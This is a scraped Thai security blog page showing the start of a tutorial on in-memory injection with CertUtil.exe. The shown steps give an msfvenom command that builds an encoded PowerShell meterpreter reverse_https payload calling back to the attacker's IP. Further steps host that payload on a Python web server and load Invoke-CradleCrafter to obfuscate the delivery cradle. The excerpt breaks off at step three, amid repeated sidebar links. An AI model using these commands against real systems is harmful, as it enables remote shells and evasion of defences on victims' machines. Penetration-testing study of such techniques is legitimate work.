obfuscate. powershell

In-Memory Injection ด้วย CertUtil.exe

1 minute read
395 views
June 3, 2018
by techsuii-admin
No comments

ก่อนหน้านี้เราใช้ unicorn ในการ obfuscate ไปแล้ว คราวนี้เราจะใช้ Invoke-CradleCrafter ในการทำ obfuscation กันบ้าง 1. สร้าง payload powershell ด้วย metasploit

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<YOUR IP HERE> LPORT=443 -e cmd/powershell_base64 -f psh -o load.txt

1	msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<YOUR IP HERE> LPORT=443 -e cmd/powershell_base64 -f psh -o load.txt

สร้าง web server สำหรับ deliver load.txt

python -m SimpleHTTPServer 80

1	python -m SimpleHTTPServer 80

2. เรียกใช้งาน Invoke-CradleCrafter

Import-Module .\Invoke-CradleCrafter.psd1; Invoke-CradleCrafter

1	Import-Module .\Invoke-CradleCrafter.psd1; Invoke-CradleCrafter

3. เมื่อเข้ามาใน Invoke-CradleCrafter…

View Post

In-Memory Injection ด้วย CertUtil.exe

Security References

LINE@Techsuii.com

Facebook

Recent Posts

Recent Comments

Archives

Categories

Meta

Creative Common

Facebook

Latest News

Cyber Security and Privacy Foundation ออก course สอนการเขียน code อย่างไรให้ปลอดภัย

Alien Vault ออกเอกสารการคอย monitor security ให้กับ AWS

VDO: OWASP AppSecUSA 2018

VDO: Malware Analysis จาก University of Cincinnati Computer Science department.

StatCounter ถูกแฮ็คเพื่อใช้โจมตี Cryptocurrency Exchange

obfuscate. powershell

In-Memory Injection ด้วย CertUtil.exe

Share

Security References

LINE@Techsuii.com

Facebook

Recent Posts

Recent Comments

Archives

Categories

Meta

Cyber Security and Privacy Foundation ออก course สอนการเขียน code อย่างไรให้ปลอดภัย

Alien Vault ออกเอกสารการคอย monitor security ให้กับ AWS

VDO: OWASP AppSecUSA 2018

VDO: Malware Analysis จาก University of Cincinnati Computer Science department.

StatCounter ถูกแฮ็คเพื่อใช้โจมตี Cryptocurrency Exchange